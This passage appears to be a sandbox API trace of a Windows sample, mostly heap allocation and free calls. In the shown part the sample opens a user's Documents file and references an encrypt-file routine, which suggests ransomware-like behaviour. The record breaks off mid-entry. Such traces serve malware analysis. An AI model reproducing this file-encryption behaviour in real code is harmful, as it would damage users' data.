HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0076.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0076.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0076.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21a0 [0076.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0076.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0076.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0076.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0076.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0076.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0076.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c08 | out: hHeap=0x1780000) returned 1 [0076.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0076.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0076.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0076.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0076.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0076.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0076.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2420 [0076.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0076.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0076.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0076.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0076.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0076.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0076.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0076.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0076.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0076.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0076.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0076.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0076.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0076.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0076.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0076.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0076.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0076.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0076.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0076.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0076.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0076.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0076.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0076.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0076.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0076.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0076.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0076.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0076.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0076.807] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0076.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0076.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0076.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0076.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0076.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0076.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0076.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0076.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0076.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0076.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0076.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0076.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0076.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0076.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0076.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0076.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0076.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0076.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0076.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0076.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0076.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0076.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0076.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0076.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0076.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0076.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0076.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0076.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0076.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0076.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0076.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0076.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0076.808] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0076.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca550, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0076.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0076.809] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0076.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0076.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0076.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0076.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0076.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0076.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0076.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0076.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0076.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0076.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0076.809] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Lh2OVLi_4PS_2RxxQd.odp" (normalized: "c:\\users\\fd1hvy\\documents\\lh2ovli_4ps_2rxxqd.odp"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0076.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0076.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0076.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0076.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0076.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eb3a8 | out: hHeap=0x1780000) returned 1 [0076.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0076.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0076.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0076.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0076.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0076.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0076.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0076.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0076.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0076.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0076.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0076.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0076.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0076.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0076.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0076.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0076.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0076.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0076.810] FreeLibrary (hLibModule=0x772d0000) returned 1 [0076.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0076.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0076.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0076.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0076.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0076.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0076.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0076.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0076.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0076.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0076.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0076.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0076.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0076.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0076.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0076.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0076.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0076.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0076.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0076.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0076.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0076.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0076.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0076.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0076.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0076.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0076.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0076.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0076.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0076.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0076.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0076.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0076.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0076.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0076.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0076.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0076.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0076.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0076.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0076.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0076.812] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0076.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0076.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0076.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0076.812] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0076.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0076.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0076.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0076.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0076.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0076.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0076.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0076.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0076.812] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0076.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0076.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0076.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c78 | out: hHeap=0x1780000) returned 1 [0076.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0076.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0076.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0076.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0076.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0076.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0076.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0076.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0076.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9de8 | out: hHeap=0x1780000) returned 1 [0076.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0076.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0076.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0076.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5b8 | out: hHeap=0x1780000) returned 1 [0076.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0076.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0076.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0076.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0076.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c08 | out: hHeap=0x1780000) returned 1 [0076.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0076.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0076.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0076.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0076.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0076.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0076.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0076.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0076.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0076.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0076.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0076.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0076.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431d938 | out: hHeap=0x1780000) returned 1 [0076.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0076.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0076.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0076.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0076.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0076.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0076.814] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9de8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0076.814] CloseHandle (hObject=0x298) returned 1 [0076.814] FreeLibrary (hLibModule=0x772d0000) returned 1 [0076.814] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0076.815] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Lh2OVLi_4PS_2RxxQd.odp", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, 